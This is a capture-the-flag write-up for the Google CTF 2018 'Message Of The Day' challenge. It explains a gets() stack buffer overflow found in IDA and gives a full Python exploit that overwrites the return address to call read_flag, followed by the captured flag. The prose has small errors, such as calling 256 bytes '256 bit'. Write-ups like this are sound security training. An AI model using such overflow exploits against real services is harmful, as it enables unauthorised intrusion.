Google CTF 2018
Message Of The Day
From the OffHub router, you jump onto the Google-Haus smart hub. This fully feature assistant of the future that uses machine learning on the blockchain to control all our IoT devices promises it all. It delivers the ability to print a Message-of-the-day. The rest is available as a premium subscription service paid monthly.
$nc motd.ctfcompetition.com 1337
You can find my all CTF solution in here
Attachement file and open server info is like above. I open the motd file in IDA
In the main function inputs taken by getline. If we want to use overflow memory vulnabities we must to search gets() funcition. Luckly, I found that, in the set_motd func. Also, buffer size is 0x100 which means 256 bit. we can use this memory for jump the given adress.
We must the find address of the flag, so that I found the get_admin_motd function and I saw read_flag function.
read_flag function opens the ./flag.txt file. It can be flag file I found the address. Now I am try to bruteforce for jump that line.
Adress is 00000000606063A5
I use gynvael’s scripts
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 |
#!/usr/bin/python import random import sys import socket import telnetlib import os import time import threading from struct import pack, unpack from time import time def recvuntil(sock, txt): d = "" while d.find(txt) == -1: try: dnow = sock.recv(1) if len(dnow) == 0: return ("DISCONNECTED", d) except socket.timeout: return ("TIMEOUT", d) except socket.error as msg: return ("ERROR", d) d += dnow return ("OK", d) def recvall(sock, n): d = "" while len(d) != n: try: dnow = sock.recv(n - len(d)) if len(dnow) == 0: return ("DISCONNECTED", d) except socket.timeout: return ("TIMEOUT", d) except socket.error as msg: return ("ERROR", d) d += dnow return ("OK", d) # Proxy object for sockets. class gsocket(object): def __init__(self, *p): self._sock = socket.socket(*p) def __getattr__(self, name): return getattr(self._sock, name) def recvall(self, n): err, ret = recvall(self._sock, n) if err != OK: return False return ret def recvuntil(self, txt): err, ret = recvuntil(self._sock, txt) if err != "OK": return False return ret # Base for any of my ROPs. def db(v): return pack("<B", v) def dw(v): return pack("<H", v) def dd(v): return pack("<I", v) def dq(v): return pack("<Q", v) def rb(v): return unpack("<B", v[0])[0] def rw(v): return unpack("<H", v[:2])[0] def rd(v): return unpack("<I", v[:4])[0] def rq(v): return unpack("<Q", v[:8])[0] def go(): global HOST global PORT s = gsocket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) # Put your code here! s.sendall("2\n") newmotd = ("A" * (256 + 8)) + dq(0x00606063A5) s.sendall(newmotd + "\n") # Interactive sockets. t = telnetlib.Telnet() t.sock = s t.interact() # Python console. # Note: you might need to modify ReceiverClass if you want # to parse incoming packets. #ReceiverClass(s).start() #dct = locals() #for k in globals().keys(): # if k not in dct: # dct[k] = globals()[k] #code.InteractiveConsole(dct).interact() s.close() HOST = 'motd.ctfcompetition.com' PORT = 1337 go() |
CTF{m07d_1s_r3t_2_r34d_fl4g}